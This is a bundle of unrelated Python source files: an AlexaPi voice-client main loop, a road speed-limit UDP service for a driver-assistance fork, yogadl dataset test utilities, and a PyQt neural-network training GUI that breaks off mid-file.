self.playlist_last_item = payload['audioItem']['streams'][-1]['streamId'] for stream in payload['audioItem']['streams']: # pylint: disable=redefined-outer-name streamId = stream['streamId'] if stream['progressReportRequired']: self.progressReportRequired.append(streamId) url = stream['streamUrl'] if stream['streamUrl'].startswith("cid:"): url = "file://" + tmp_path + stream['streamUrl'].lstrip("cid:") + ".mp3" if (url.find('radiotime.com') != -1): url = self.tunein_playlist(url) self.pHandler.queued_play(mrl_fix(url), stream['offsetInMilliseconds'], audio_type='media', stream_id=streamId) def play_speech(self, mrl): self.stop() self.pHandler.blocking_play(mrl) def stop(self): self.pHandler.stop() def is_playing(self): return self.pHandler.is_playing() def get_volume(self): return self.pHandler.volume def set_volume(self, volume): self.pHandler.set_volume(volume) def playback_callback(self, requestType, playerActivity, streamId): if (requestType == RequestType.STARTED) and (playerActivity == PlayerActivity.PLAYING): self.platform.indicate_playback() elif (requestType in [RequestType.INTERRUPTED, RequestType.FINISHED, RequestType.ERROR]) and (playerActivity == PlayerActivity.IDLE): self.platform.indicate_playback(False) if streamId: if streamId in self.progressReportRequired: self.progressReportRequired.remove(streamId) gThread = threading.Thread(target=alexa_playback_progress_report_request, args=(requestType, playerActivity, streamId)) gThread.start() if (requestType == RequestType.FINISHED) and (playerActivity == PlayerActivity.IDLE) and (self.playlist_last_item == streamId): gThread = threading.Thread(target=alexa_getnextitem, args=(self.navigation_token,)) self.navigation_token = None gThread.start() def tunein_playlist(self, url): logger.debug("TUNE IN URL = %s", url) req = requests.get(url) lines = req.content.decode().split('\n') nurl = self.tunein_parser.parse_stream_url(lines[0]) if nurl: return nurl[0] return "" # Playback handler def playback_callback(requestType, playerActivity, streamId): return player.playback_callback(requestType, playerActivity, streamId) im = importlib.import_module('alexapi.playback_handlers.' + config['sound']['playback_handler'] + "handler", package=None) cl = getattr(im, config['sound']['playback_handler'].capitalize() + 'Handler') pHandler = cl(config, playback_callback) player = Player(config, platform, pHandler) path = os.path.realpath(__file__).rstrip(os.path.basename(__file__)) resources_path = os.path.join(path, 'resources', '') tmp_path = os.path.join(tempfile.mkdtemp(prefix='AlexaPi-runtime-'), '') MAX_VOLUME = 100 MIN_VOLUME = 30 def mrl_fix(url): if ('#' in url) and url.startswith('file://'): new_url = url.replace('#', '.hashMark.') os.rename(url.replace('file://', ''), new_url.replace('file://', '')) url = new_url return url def internet_on(): try: requests.get('https://api.amazon.com/auth/o2/token') logger.info("Connection OK") return True except requests.exceptions.RequestException: logger.error("Connection Failed") return False class Token(object): _token = '' _timestamp = None _validity = 3570 def __init__(self, aconfig): self._aconfig = aconfig if not self._aconfig.get('refresh_token'): logger.critical("AVS refresh_token not found in the configuration file. " "Run the setup again to fix your installation (see project wiki for installation instructions).") raise ConfigurationException self.renew() def __str__(self): if (not self._timestamp) or (time.time() - self._timestamp > self._validity): logger.debug("AVS token: Expired") self.renew() return self._token def renew(self): logger.info("AVS token: Requesting a new one") payload = { "client_id": self._aconfig['Client_ID'], "client_secret": self._aconfig['Client_Secret'], "refresh_token": self._aconfig['refresh_token'], "grant_type": "refresh_token" } url = "https://api.amazon.com/auth/o2/token" try: response = requests.post(url, data=payload) resp = json.loads(response.text) self._token = resp['access_token'] self._timestamp = time.time() logger.info("AVS token: Obtained successfully") except requests.exceptions.RequestException as exp: logger.critical("AVS token: Failed to obtain a token: " + str(exp)) # from https://github.com/respeaker/Alexa/blob/master/alexa.py def alexa_speech_recognizer_generate_data(audio, boundary): """ Generate a iterator for chunked transfer-encoding request of Alexa Voice Service Args: audio: raw 16 bit LSB audio data boundary: boundary of multipart content Returns: """ logger.debug('Start sending speech to Alexa Voice Service') chunk = '--%s\r\n' % boundary chunk += ( 'Content-Disposition: form-data; name="request"\r\n' 'Content-Type: application/json; charset=UTF-8\r\n\r\n' ) data = { "messageHeader": { "deviceContext": [{ "name": "playbackState", "namespace": "AudioPlayer", "payload": { "streamId": "", "offsetInMilliseconds": "0", "playerActivity": "IDLE" } }] }, "messageBody": { "profile": "alexa-close-talk", "locale": "en-us", "format": "audio/L16; rate=16000; channels=1" } } yield bytes(chunk + json.dumps(data) + '\r\n', 'utf8') chunk = '--%s\r\n' % boundary chunk += ( 'Content-Disposition: form-data; name="audio"\r\n' 'Content-Type: audio/L16; rate=16000; channels=1\r\n\r\n' ) yield bytes(chunk, 'utf8') for audio_chunk in audio: yield audio_chunk yield bytes('--%s--\r\n' % boundary, 'utf8') logger.debug('Finished sending speech to Alexa Voice Service') platform.indicate_processing() def alexa_speech_recognizer(audio_stream): # https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/speechrecognizer-requests url = 'https://access-alexa-na.amazon.com/v1/avs/speechrecognizer/recognize' boundary = 'this-is-a-boundary' headers = { 'Authorization': 'Bearer %s' % token, 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, 'Transfer-Encoding': 'chunked', } data = alexa_speech_recognizer_generate_data(audio_stream, boundary) resp = requests.post(url, headers=headers, data=data) platform.indicate_processing(False) process_response(resp) def alexa_getnextitem(navigationToken): # https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-getnextitem-request logger.debug("Sending GetNextItem Request...") url = 'https://access-alexa-na.amazon.com/v1/avs/audioplayer/getNextItem' headers = { 'Authorization': 'Bearer %s' % token, 'content-type': 'application/json; charset=UTF-8' } data = { "messageHeader": {}, "messageBody": { "navigationToken": navigationToken } } response = requests.post(url, headers=headers, data=json.dumps(data)) process_response(response) def alexa_playback_progress_report_request(requestType, playerActivity, stream_id): # https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-events-requests # streamId Specifies the identifier for the current stream. # offsetInMilliseconds Specifies the current position in the track, in milliseconds. # playerActivity IDLE, PAUSED, or PLAYING logger.debug("Sending Playback Progress Report Request...") headers = { 'Authorization': 'Bearer %s' % token } data = { "messageHeader": {}, "messageBody": { "playbackState": { "streamId": stream_id, "offsetInMilliseconds": 0, "playerActivity": playerActivity.upper() } } } if requestType.upper() == RequestType.ERROR: # The Playback Error method sends a notification to AVS that the audio player has experienced an issue during playback. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackError" elif requestType.upper() == RequestType.FINISHED: # The Playback Finished method sends a notification to AVS that the audio player has completed playback. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackFinished" elif requestType.upper() == PlayerActivity.IDLE: # This is an error as described in https://github.com/alexa-pi/AlexaPi/issues/117 # The Playback Idle method sends a notification to AVS that the audio player has reached the end of the playlist. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackIdle" elif requestType.upper() == RequestType.INTERRUPTED: # The Playback Interrupted method sends a notification to AVS that the audio player has been interrupted. # Note: The audio player may have been interrupted by a previous stop Directive. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackInterrupted" elif requestType.upper() == "PROGRESS_REPORT": # The Playback Progress Report method sends a notification to AVS with the current state of the audio player. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackProgressReport" elif requestType.upper() == RequestType.STARTED: # The Playback Started method sends a notification to AVS that the audio player has started playing. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackStarted" response = requests.post(url, headers=headers, data=json.dumps(data)) if response.status_code != 204: logger.warning("(alexa_playback_progress_report_request Response) %s", response) else: logger.debug("Playback Progress Report was Successful") def process_response(response): logger.debug("Processing Request Response...") if response.status_code == 200: try: data = bytes("Content-Type: ", 'utf-8') + bytes(response.headers['content-type'], 'utf-8') + bytes('\r\n\r\n', 'utf-8') + response.content msg = email.message_from_bytes(data) # pylint: disable=no-member except AttributeError: data = "Content-Type: " + response.headers['content-type'] + '\r\n\r\n' + response.content msg = email.message_from_string(data) for payload in msg.get_payload(): if payload.get_content_type() == "application/json": j = json.loads(payload.get_payload()) logger.debug("JSON String Returned: %s", json.dumps(j, indent=2)) elif payload.get_content_type() == "audio/mpeg": filename = tmp_path + payload.get('Content-ID').strip("<>") + ".mp3" with open(filename, 'wb') as f: f.write(payload.get_payload(decode=True)) else: logger.debug("NEW CONTENT TYPE RETURNED: %s", payload.get_content_type()) # Now process the response if 'directives' in j['messageBody']: if not j['messageBody']['directives']: logger.debug("0 Directives received") for directive in j['messageBody']['directives']: if directive['namespace'] == 'SpeechSynthesizer': if directive['name'] == 'speak': player.play_speech(mrl_fix("file://" + tmp_path + directive['payload']['audioContent'].lstrip("cid:") + ".mp3")) elif directive['namespace'] == 'SpeechRecognizer': if directive['name'] == 'listen': logger.debug("Further Input Expected, timeout in: %sms", directive['payload']['timeoutIntervalInMillis']) player.play_speech(resources_path + 'beep.wav') timeout = directive['payload']['timeoutIntervalInMillis'] / 116 audio_stream = capture.silence_listener(timeout) # now process the response alexa_speech_recognizer(audio_stream) elif directive['namespace'] == 'AudioPlayer': if directive['name'] == 'play': player.play_playlist(directive['payload']) elif directive['namespace'] == "Speaker": # speaker control such as volume if directive['name'] == 'SetVolume': vol_token = directive['payload']['volume'] type_token = directive['payload']['adjustmentType'] if (type_token == 'relative'): volume = player.get_volume() + int(vol_token) else: volume = int(vol_token) if (volume > MAX_VOLUME): volume = MAX_VOLUME elif (volume < MIN_VOLUME): volume = MIN_VOLUME player.set_volume(volume) logger.debug("new volume = %s", volume) # Additional Audio Iten elif 'audioItem' in j['messageBody']: player.play_playlist(j['messageBody']) return elif response.status_code == 204: logger.debug("Request Response is null (This is OKAY!)") else: logger.info("(process_response Error) Status Code: %s", response.status_code) response.connection.close() platform.indicate_failure() trigger_thread = None def trigger_callback(trigger): global trigger_thread logger.info("Triggered: %s", trigger.name) triggers.disable() trigger_thread = threading.Thread(target=trigger_process, args=(trigger,)) trigger_thread.setDaemon(True) trigger_thread.start() def trigger_process(trigger): if player.is_playing(): player.stop() # clean up the temp directory if not debug: for some_file in os.listdir(tmp_path): file_path = os.path.join(tmp_path, some_file) try: if os.path.isfile(file_path): os.remove(file_path) except Exception as exp: # pylint: disable=broad-except logger.warning(exp) if event_commands['pre_interaction']: subprocess.Popen(event_commands['pre_interaction'], shell=True, stdout=subprocess.PIPE) force_record = None if trigger.event_type in triggers.types_continuous: force_record = (trigger.continuous_callback, trigger.event_type in triggers.types_vad) if trigger.voice_confirm: player.play_speech(resources_path + 'alexayes.mp3') audio_stream = capture.silence_listener(force_record=force_record) alexa_speech_recognizer(audio_stream) triggers.enable() if event_commands['post_interaction']: subprocess.Popen(event_commands['post_interaction'], shell=True, stdout=subprocess.PIPE) def cleanup(signal, frame): # pylint: disable=redefined-outer-name,unused-argument triggers.disable() capture.cleanup() pHandler.cleanup() platform.cleanup() shutil.rmtree(tmp_path) if event_commands['shutdown']: subprocess.Popen(event_commands['shutdown'], shell=True, stdout=subprocess.PIPE) sys.exit(0) if __name__ == "__main__": if event_commands['startup']: subprocess.Popen(event_commands['startup'], shell=True, stdout=subprocess.PIPE) try: capture = alexapi.capture.Capture(config, tmp_path) except ConfigurationException as exp: logger.critical(exp) sys.exit(1) capture.setup(platform.indicate_recording) triggers.init(config, trigger_callback, capture) triggers.setup() pHandler.setup() platform.setup() for sig in (signal.SIGABRT, signal.SIGILL, signal.SIGINT, signal.SIGSEGV, signal.SIGTERM): signal.signal(sig, cleanup) logger.info("Checking Internet Connection ...") while not internet_on(): time.sleep(1) try: token = Token(config['alexa']) if not str(token): raise RuntimeError except (ConfigurationException, RuntimeError): platform.indicate_failure() sys.exit(1) platform_trigger_callback = triggers.triggers['platform'].platform_callback if 'platform' in triggers.triggers else None platform.after_setup(platform_trigger_callback) triggers.enable() if not silent: player.play_speech(resources_path + "hello.mp3") platform.indicate_success() while True: time.sleep(1)
road_speed_limiter.py
import json import select import threading import time import socket import fcntl import struct from threading import Thread from cereal import messaging from common.params import Params from common.numpy_fast import interp CAMERA_SPEED_FACTOR = 1.05 class Port: BROADCAST_PORT = 2899 RECEIVE_PORT = 843 LOCATION_PORT = 2911 class RoadLimitSpeedServer: def __init__(self): self.json_road_limit = None self.active = 0 self.last_updated = 0 self.last_updated_active = 0 self.last_exception = None self.lock = threading.Lock() self.remote_addr = None broadcast = Thread(target=self.broadcast_thread, args=[]) broadcast.setDaemon(True) broadcast.start() #gps = Thread(target=self.gps_thread, args=[]) #gps.setDaemon(True) #gps.start() def gps_thread(self): sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal']) with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock: while True: try: sm.update() if self.remote_addr is not None and sm.updated['gpsLocationExternal']: location = sm['gpsLocationExternal'] json_location = json.dumps([ location.latitude, location.longitude, location.altitude, location.speed, location.bearingDeg, location.accuracy, location.timestamp, location.source, location.vNED, location.verticalAccuracy, location.bearingAccuracyDeg, location.speedAccuracy, ]) address = (self.remote_addr[0], Port.LOCATION_PORT) sock.sendto(json_location.encode(), address) else: time.sleep(1.) except Exception as e: print("exception", e) time.sleep(1.) def get_broadcast_address(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ip = fcntl.ioctl( s.fileno(), 0x8919, struct.pack('256s', 'wlan0'.encode('utf-8')) )[20:24] return socket.inet_ntoa(ip) except: return None def broadcast_thread(self): broadcast_address = None frame = 0 with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock: try: sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) while True: try: if broadcast_address is None or frame % 10 == 0: broadcast_address = self.get_broadcast_address() print('broadcast_address', broadcast_address) if broadcast_address is not None: address = (broadcast_address, Port.BROADCAST_PORT) sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address) except: pass time.sleep(5.) frame += 1 except: pass def udp_recv(self, sock): ret = False try: ready = select.select([sock], [], [], 1.) ret = bool(ready[0]) if ret: data, self.remote_addr = sock.recvfrom(2048) json_obj = json.loads(data.decode()) try: self.lock.acquire() try: if 'active' in json_obj: self.active = json_obj['active'] self.last_updated_active = time.monotonic() except: pass if 'road_limit' in json_obj: self.json_road_limit = json_obj['road_limit'] self.last_updated = time.monotonic() finally: self.lock.release() except: try: self.lock.acquire() self.json_road_limit = None finally: self.lock.release() return ret def check(self): now = time.monotonic() if now - self.last_updated > 20.: try: self.lock.acquire() self.json_road_limit = None finally: self.lock.release() if now - self.last_updated_active > 10.: self.active = 0 def get_limit_val(self, key, default=None): if self.json_road_limit is None: return default if key in self.json_road_limit: return self.json_road_limit[key] return default def main(): server = RoadLimitSpeedServer() roadLimitSpeed = messaging.pub_sock('roadLimitSpeed') with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock: try: sock.bind(('0.0.0.0', Port.RECEIVE_PORT)) sock.setblocking(False) while True: if server.udp_recv(sock): dat = messaging.new_message() dat.init('roadLimitSpeed') dat.roadLimitSpeed.active = server.active dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0) dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False) dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0) dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0) dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0) dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0) dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0) roadLimitSpeed.send(dat.to_bytes()) server.check() except Exception as e: server.last_exception = e class RoadSpeedLimiter: def __init__(self): self.slowing_down = False self.start_dist = 0 self.longcontrol = Params().get_bool('LongControlEnabled') self.sock = messaging.sub_sock("roadLimitSpeed") self.roadLimitSpeed = None def recv(self): try: dat = messaging.recv_sock(self.sock, wait=False) if dat is not None: self.roadLimitSpeed = dat.roadLimitSpeed except: pass def get_active(self): self.recv() if self.roadLimitSpeed is not None: return self.roadLimitSpeed.active return 0 def get_max_speed(self, CS, v_cruise_speed): log = "" self.recv() if self.roadLimitSpeed is None: return 0, 0, 0, False, "" try: road_limit_speed = self.roadLimitSpeed.roadLimitSpeed is_highway = self.roadLimitSpeed.isHighway cam_type = int(self.roadLimitSpeed.camType) cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist cam_limit_speed = self.roadLimitSpeed.camLimitSpeed section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed section_left_dist = self.roadLimitSpeed.sectionLeftDist if is_highway is not None: if is_highway: MIN_LIMIT = 40 MAX_LIMIT = 120 else: MIN_LIMIT = 30 MAX_LIMIT = 100 else: MIN_LIMIT = 30 MAX_LIMIT = 120 # log = "RECV: " + str(is_highway) # log += ", " + str(cam_limit_speed) # log += ", " + str(cam_limit_speed_left_dist) # log += ", " + str(section_limit_speed) # log += ", " + str(section_left_dist) v_ego = CS.clu11["CF_Clu_Vanz"] / 3.6 if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0: diff_speed = v_ego * 3.6 - cam_limit_speed if self.longcontrol: sec = interp(diff_speed, [10., 30.], [12., 17.]) else: sec = interp(diff_speed, [10., 30.], [14., 19.]) if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec): if not self.slowing_down: self.start_dist = cam_limit_speed_left_dist * 1.2 self.slowing_down = True first_started = True else: first_started = False base = self.start_dist / 1.2 * 0.65 td = self.start_dist - base d = cam_limit_speed_left_dist - base if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10): pp = d / td else: pp = 0 return cam_limit_speed * CAMERA_SPEED_FACTOR + int( pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log self.slowing_down = False return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0: if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT: if not self.slowing_down: self.slowing_down = True first_started = True else: first_started = False return section_limit_speed, section_limit_speed, section_left_dist, first_started, log self.slowing_down = False return 0, section_limit_speed, section_left_dist, False, log except Exception as e: log = "Ex: " + str(e) pass self.slowing_down = False return 0, 0, 0, False, log road_speed_limiter = None def road_speed_limiter_get_active(): global road_speed_limiter if road_speed_limiter is None: road_speed_limiter = RoadSpeedLimiter() return road_speed_limiter.get_active() def road_speed_limiter_get_max_speed(CS, v_cruise_speed): global road_speed_limiter if road_speed_limiter is None: road_speed_limiter = RoadSpeedLimiter() return road_speed_limiter.get_max_speed(CS, v_cruise_speed) if __name__ == "__main__": main()
util.py
# Copyright 2020 Determined AI. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== import asyncio import threading from typing import Optional import boto3 import google.cloud.storage as google_storage import numpy as np import tensorflow as tf import tensorflow_datasets as tfds from yogadl import rw_coordinator, storage def make_mnist_test_dataset() -> tf.data.Dataset: mnist_builder = tfds.builder("mnist") mnist_builder.download_and_prepare() # We use test because for tfds version < 1.3 the # train split is automatically shuffled, breaking # the test. mnist_test = mnist_builder.as_dataset(split="test") return mnist_test def cleanup_lfs_storage( configurations: storage.LFSConfigurations, dataset_id: str, dataset_version: str ) -> None: cache_filepath = ( configurations.storage_dir_path.joinpath(dataset_id) .joinpath(dataset_version) .joinpath("cache.mdb") ) if cache_filepath.exists(): cache_filepath.unlink() def cleanup_gcs_storage( configurations: storage.GCSConfigurations, dataset_id: str, dataset_version: str ) -> None: gcs_cache_filepath = ( configurations.bucket_directory_path.joinpath(dataset_id) .joinpath(dataset_version) .joinpath("cache.mdb") ) client = google_storage.Client() bucket = client.bucket(configurations.bucket) blob = bucket.blob(str(gcs_cache_filepath)) if blob.exists(): blob.delete() def cleanup_s3_storage( configurations: storage.S3Configurations, dataset_id: str, dataset_version: str ) -> None: s3_cache_filepath = ( configurations.bucket_directory_path.joinpath(dataset_id) .joinpath(dataset_version) .joinpath("cache.mdb") ) client = boto3.client("s3") client.delete_object(Bucket=configurations.bucket, Key=str(s3_cache_filepath)) class AccessServerHandler: def __init__(self, hostname: str, port: int) -> None: self._access_server = rw_coordinator.RwCoordinatorServer(hostname=hostname, port=port) self._thread_running_server = None # type: Optional[threading.Thread] def run_server_in_thread(self) -> None: asyncio.get_event_loop().run_until_complete(self._access_server.run_server()) self._thread_running_server = threading.Thread(target=asyncio.get_event_loop().run_forever) self._thread_running_server.start() def stop_server(self) -> None: self._access_server.stop_server() assert self._thread_running_server self._thread_running_server.join() def compare_datasets_graph_mode( original_dataset: tf.data.Dataset, dataset_from_stream: tf.data.Dataset ) -> int: next_element_from_stream = dataset_from_stream.make_one_shot_iterator().get_next() next_element_from_orig = original_dataset.make_one_shot_iterator().get_next() data_samples = 0 with tf.Session() as sess: while True: try: element_from_stream = sess.run(next_element_from_stream) element_from_dataset = sess.run(next_element_from_orig) assert element_from_stream["label"] == element_from_dataset["label"] assert np.array_equal(element_from_stream["image"], element_from_dataset["image"]) data_samples += 1 except tf.errors.OutOfRangeError: break return data_samples def compare_datasets_eager_mode( original_dataset: tf.data.Dataset, dataset_from_stream: tf.data.Dataset ) -> int: next_element_from_stream = dataset_from_stream.as_numpy_iterator() next_element_from_orig = original_dataset.as_numpy_iterator() data_samples = 0 for orig_dict, from_stream_dict in zip(next_element_from_orig, next_element_from_stream): for orig_data, from_stream_data in zip(orig_dict, from_stream_dict): assert np.array_equal(orig_data, from_stream_data) data_samples += 1 return data_samples def compare_datasets( original_dataset: tf.data.Dataset, dataset_from_stream: tf.data.Dataset ) -> int: if tf.executing_eagerly(): return compare_datasets_eager_mode(original_dataset, dataset_from_stream) else: return compare_datasets_graph_mode(original_dataset, dataset_from_stream)
LR2.py
""" Licensed under the Unlicense License; you may not use this file except in compliance with the License. You may obtain a copy of the License at https://unlicense.org Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import csv import threading import numpy as np import cv2 import sys from PyQt5 import QtWidgets import random from PyQt5.QtGui import QPixmap from PyQt5.QtGui import QPalette, QColor import qimage2ndarray import pickle import json import gui_2 def sigmoid(x): return 1 / (1 + np.exp(-x)) def dot_0_layer(input_layer, synaptic_weights): return layer_0_activator(np.dot(input_layer, synaptic_weights.T)) def valmap(value, istart, istop, ostart, ostop): return ostart + (ostop - ostart) * ((value - istart) / (istop - istart)) def layer_0_activator(weights_sum): # THE ASS IS COMING # return max(0, weights_sum) result = [[0] * weights_sum[0]] * weights_sum for i in range(len(weights_sum)): sample_result = [0] * weights_sum[0] for k in range(len(weights_sum[i])): threshold = 1.8 # 1.79 if weights_sum[i][k] >= threshold: sample_result[k] = weights_sum[i][k] - 2.2 # 0.79 # weights_sum[i][k] - 1.6 # weights_sum[i][k] - 2.1 else: sample_result[k] = 0 # sample_result[k] = max(2, weights_sum[i][k] - 2) result[i] = sample_result result = np.array(result) # print(result) # exit(0) return np.array(result) class CollectorApp(QtWidgets.QMainWindow, gui_2_2.Ui_MainWindow): def __init__(self): super().__init__() self.setupUi(self) self.btn_load_train_array.clicked.connect(self.load_train_array) self.btn_start_training.clicked.connect(self.start_training) self.btn_load_test_array.clicked.connect(self.load_test_array) self.btn_predict.clicked.connect(self.predict_test_image) self.btn_save_to_file.clicked.connect(self.save_to_file) self.btn_load_from_file.clicked.connect(self.load_from_file) self.test_values = False self.synaptic_weights_0 = np.array([]) self.synaptic_weights_1 = np.array([]) self.train_images = np.array([]) self.train_labels = np.array([]) self.test_array = np.array([]) self.test_labels = np.array([]) self.test_image = None def load_train_data(self, debug, folder): train_images = [] train_labels = [] for i in range(4): train_data_temp = cv2.cvtColor(cv2.imread(folder + str(i) + '.bmp'), cv2.COLOR_BGR2GRAY) / 255.0 for x in range(32): # 32 for y in range(32): # 32 temp_data = train_data_temp[y: y + 16, x: x + 16].flatten() train_images.append(temp_data) train_labels.append(i) combined_lists = list(zip(train_images, train_labels)) random.shuffle(combined_lists) train_images, train_labels = zip(*combined_lists) self.train_images = np.array(train_images) self.train_labels = np.array([train_labels]) # TEST VALUES if self.test_values: self.train_images = [] self.train_labels = [] for _ in range(50): a = [] b = [] for _ in range(8): a.append(random.randrange(0, 10) / 10) b.append(a[0] + a[1]) b.append(a[2] + a[3]) b.append(a[4] + a[5]) b.append(a[6] + a[7]) self.train_labels.append(np.argmax(b)) self.train_images.append(a) self.train_images = np.array(self.train_images) self.train_labels = np.array([self.train_labels]) if debug: print('-------------------- TRAIN DATA --------------------') print('Shape of train_images: ' + str(self.train_images.shape)) print('Shape of train_labels: ' + str(self.train_labels.shape)) print('Arrays:') print(self.train_images) print() print(self.train_labels) print('----------------------------------------------------') def load_test_array(self): self.test_image = cv2.cvtColor(cv2.imread(self.line_folder.text() + 'test/' + str(self.spin_test_array_id.value() - 1) + '.bmp'), cv2.COLOR_BGR2GRAY) self.ocl_test_array.setPixmap(QPixmap.fromImage(qimage2ndarray.array2qimage( cv2.cvtColor(cv2.resize(self.test_image, (256, 256)), cv2.COLOR_GRAY2RGB)))) def predict_test_image(self): # noinspection PyBroadException try: x = random.randrange(0, 32) y = random.randrange(0, 32) temp_image = self.test_image[y * 16: y * 16 + 16, x * 16: x * 16 + 16] self.ocl_test_image.setPixmap(QPixmap.fromImage(qimage2ndarray.array2qimage( cv2.cvtColor(cv2.resize(temp_image, (128, 128), interpolation=cv2.INTER_NEAREST), cv2.COLOR_GRAY2RGB)))) self.test_array = np.array([(temp_image / 255.0).flatten()]) self.test_labels = np.array([[self.spin_test_array_id.value() - 1]]) output_l0 = self.test_array output_l1 = dot_0_layer(output_l0, self.synaptic_weights_0) output_l2 = sigmoid(np.dot(output_l1, self.synaptic_weights_1.T)) if np.argmax(output_l2[0]) == self.test_labels[0][0]: self.label_predicted.setText(str(int(np.argmax(output_l2[0]) + 1)) + ' YEAH') else: self.label_predicted.setText(str(int(np.argmax(output_l2[0]) + 1)) + ' NOPE') self.progressBar_2.setValue(output_l2[0][0] * 100) self.progressBar_3.setValue(output_l2[0][1] * 100) self.progressBar_4.setValue(output_l2[0][2] * 100) self.progressBar_5.setValue(output_l2[0][3] * 100) except: print(sys.exc_info()) def save_to_file(self): compressed_data = [self.synaptic_weights_0, self.synaptic_weights_1] with open(self.line_folder.text() + 'model.txt', 'wb') as filehandle: pickle.dump(compressed_data, filehandle) def load_from_file(self): with open(self.line_folder.text() + 'model.txt', 'rb') as filehandle: compressed_data = pickle.load(filehandle) self.synaptic_weights_0 = np.array(compressed_data[0]) self.synaptic_weights_1 = np.array(compressed_data[1]) print('-------------------- WEIGHTS --------------------') print('Shape of synaptic_weights_0: ' + str(self.synaptic_weights_0.shape)) print('Shape of synaptic_weights_1: ' + str(self.synaptic_weights_1.shape)) print('Arrays:') print(self.synaptic_weights_0) print() print(self.synaptic_weights_1) print('-------------------------------------------------') def load_train_array(self): random.seed = 1 np.random.seed(1) self.load_train_data(True, self.line_folder.text()) # Synaptic weights arrays self.synaptic_weights_0 = [] for i in range(512): string_array = [int(random.randrange(-1, 2)) for _ in range(3)] + [0 for _ in range(253)] random.shuffle(string_array) self.synaptic_weights_0.append(string_array) self.synaptic_weights_0 = np.array(self.synaptic_weights_0) self.synaptic_weights_1 = np.array(2 * np.random.random((4, 512)) - 1) # TEST VALUES if self.test_values: self.synaptic_weights_0 = [] for i in range(16): string_array = [int(random.randrange(-1, 2)) for _ in range(3)] + [0 for _ in range(5)] random.shuffle(string_array) self.synaptic_weights_0.append(string_array) self.synaptic_weights_0 = np.array(self.synaptic_weights_0) self.synaptic_weights_1 = np.array(2 * np.random.random((4, 16)) - 1) if True: print('-------------------- WEIGHTS --------------------') print('Shape of synaptic_weights_0: ' + str(self.synaptic_weights_0.shape)) print('Shape of synaptic_weights_1: ' + str(self.synaptic_weights_1.shape)) print('Arrays:') print(self.synaptic_weights_0) print() print(self.synaptic_weights_1) print('-------------------------------------------------') def start_training(self): thread = threading.Thread(target=self.training) thread.start() def training(self): # noinspection PyBroadException try: i = 0 while i < int(self.spin_iterations.value()): output_l0 = self.train_images output_l1 = dot_0_layer(output_l0, self.synaptic_weights_0) output_l2 = sigmoid(np.dot(output_l1, self.synaptic_weights_1.T)) # Layer 2 error calculations error_l2 = [] for k in range(len(output_l2)): a = [] for m in range(4): if m == self.train_labels[0][k]: a.append(1 - output_l2[k][m]) else: a.append(0 - output_l2[k][m]) error_l2.append(a) error_l2 = np.array(error_l2) adjustments_l2 = output_l1.T.dot(error_l2 * (output_l2 * (1 - output_l2))) self.synaptic_weights_1 += adjustments_l2.T # Occuracy calculations predicted = [] occuracy = 0 for k in range(len(output_l2)): predicted.append(np.argmax(output_l2[k])) if np.argmax(output_l2[k]) == self.train_labels[0][k]: occuracy += 1 occuracy /= len(output_l2) predicted = np.array(predicted) if i % 1 == 0: print('-------------------- I: ' + str(i) + ' --------------------') # print('output_l2: ' + str(output_l2)) # print('error_l2: ' + str(error_l2)) print('predicted: ' + str(predicted)) print('occuracy: ' + str(occuracy)) # print('adjustments_l2: ' + str(adjustments_l2)) # print('----------------------------------------------') i += 1 self.progressBar.setValue(valmap(i, 0, self.spin_iterations.value(), 0, 100)) self.progressBar.setValue(0) except: print(sys.exc_info()) if __name__ == '__main__': app = QtWidgets.QApplication(sys.argv) app.setStyle("Fusion") """ dark_palette = QPalette() WHITE = QColor(255, 255, 255) BLACK = QColor(0, 0, 0) RED = QColor(255, 0, 0) PRIMARY = QColor(53, 53, 53) SECONDARY = QColor(25, 25, 25) 